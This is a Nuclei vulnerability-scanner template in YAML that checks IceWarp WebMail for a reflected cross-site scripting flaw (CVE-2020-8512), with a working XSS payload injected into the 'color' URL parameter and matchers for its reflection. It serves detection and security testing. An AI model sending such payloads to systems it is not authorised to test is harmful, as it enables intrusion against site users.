nuclei-templates/cves/CVE-2020-8512.yaml

24 lines
620 B
YAML

id: CVE-2020-8512
info:
name: IceWarp WebMail XSS
author: pdnuclei & dwisiswant0
severity: medium
# source:- https://www.exploit-db.com/exploits/47988
# https://twitter.com/sagaryadav8742/status/1275170967527006208
requests:
- method: GET
path:
- '{{BaseURL}}/webmail/?color="><svg/onload=alert(document.domain)>"'
- '{{BaseURL}}:32000/webmail/?color="><svg/onload=alert(document.domain)>"'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(document.domain)>\"\">"
part: body
- type: status
status:
- 200